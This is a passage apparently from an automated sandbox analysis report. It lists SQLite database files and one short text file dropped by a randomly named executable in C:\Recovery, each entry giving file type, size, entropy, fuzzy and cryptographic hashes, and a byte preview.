                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):4.403856189774723
                                                    Encrypted:false
                                                    SSDEEP:3:WX9XEhK:QB
                                                    MD5:6163B102B0FBA4D85CC0B56939C5FBD5
                                                    SHA1:333EB0E96B59EC850292B6B8B8F32B23927BD6FC
                                                    SHA-256:AB8F156C99EB4329F4292046D589CE6E2E4F98493A62763A3AE933A99E473059
                                                    SHA-512:F0C7052F78C75396078F23DB58A7D26122DE7AC043F8CE0B17DF9B6C1368CF3599CB5D53B84D855E91FDDD1AF89006D98DEE930A2262C07EB9D19AC993D098CC
                                                    Malicious:false
                                                    Preview:WkMRf02zRprK4MoIA7wVHamWh
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
